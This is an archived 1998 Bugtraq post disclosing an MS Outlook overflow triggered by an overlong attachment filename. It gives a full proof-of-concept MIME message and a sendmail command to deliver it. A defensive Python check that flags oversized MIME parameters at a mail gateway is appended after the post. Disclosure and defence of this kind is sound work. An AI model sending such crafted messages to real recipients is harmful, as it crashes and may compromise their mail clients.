[7478] in bugtraq


One of the Outlook overflows

daemon@ATHENA.MIT.EDU (Ryan Veety)
Wed Jul 29 21:43:28 1998

Date: 	Wed, 29 Jul 1998 16:34:54 -0400
Reply-To: Ryan Veety <root@RYANSPC.COM>
From: Ryan Veety <root@RYANSPC.COM>
To: BUGTRAQ@NETSPACE.ORG

There have been a few posts about overflows in MS Outlook, but they have
not told exactly where in the message the overflow exists.  I have found
one of them, within the description of an attachment.  If the filename
given is very large, it makes Outlook crash.  I tried this on Outlook
v4.72.2106.4 on NT 4.0, and on win95.  In both cases it reported an error
at address 0x41414141 (41 == hex A).  Here is the message that caused the
errors:

--------------------------- START HERE --------------------------------

From: <From address here>
To: <To address here>
Subject: test
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

------------------------ END HERE --------------------------------------

To send the message, save it to a file, set the to: and from:, and run
"sendmail -t < fileyousaved"

It causes Outlook to crash when the user attempts to open or save the
file.  According to a previous post, there are many of these overflows in
the attachment descriptors.  This one requires the user to open the
attachment, but similar overflows may not.

Ryan

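
A defensive check for the condition described in the post above, as an added example that is not part of the original message: it parses a message with Python's standard email package and reports any Content-Disposition or Content-Type parameter (such as filename) longer than a limit. The 255-character limit, the function names and the constructed sample message are assumptions, not values from the post.

```python
import email

MAX_PARAM_LEN = 255  # assumed threshold, not from the post; tune for your gateway


def oversized_mime_params(raw_message, limit=MAX_PARAM_LEN):
    """Return (part_index, header, param_name, length) for each overlong parameter."""
    msg = email.message_from_string(raw_message)
    findings = []
    for index, part in enumerate(msg.walk()):
        for header in ("Content-Disposition", "Content-Type"):
            # get_params() returns [(name, value), ...]; the first pair is the
            # main value (e.g. "attachment"), the rest are its parameters.
            for name, value in part.get_params(failobj=[], header=header)[1:]:
                if isinstance(value, tuple):  # RFC 2231: (charset, language, value)
                    value = value[2]
                if len(value) > limit:
                    findings.append((index, header, name.lower(), len(value)))
    return findings


def sample_message(filename):
    """Constructed test message with the same layout as the one in the post."""
    return (
        "From: sender@example.com\n"
        "To: rcpt@example.com\n"
        "Subject: test\n"
        "MIME-Version: 1.0\n"
        'Content-Type: MULTIPART/MIXED; BOUNDARY="constructed-boundary"\n'
        "\n"
        "--constructed-boundary\n"
        "Content-Type: TEXT/PLAIN; charset=US-ASCII\n"
        "\n"
        "test\n"
        "\n"
        "--constructed-boundary\n"
        "Content-Type: TEXT/PLAIN; charset=US-ASCII\n"
        "Content-Disposition: attachment; filename=" + filename + "\n"
        "\n"
        "body\n"
        "--constructed-boundary--\n"
    )


if __name__ == "__main__":
    for hit in oversized_mime_params(sample_message("A" * 600)):
        print("part %d: %s %s is %d characters long" % hit)
```

A mail gateway or filter can run a check like this before delivery and quarantine or rewrite messages that trip it, so the client never parses the oversized parameter.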
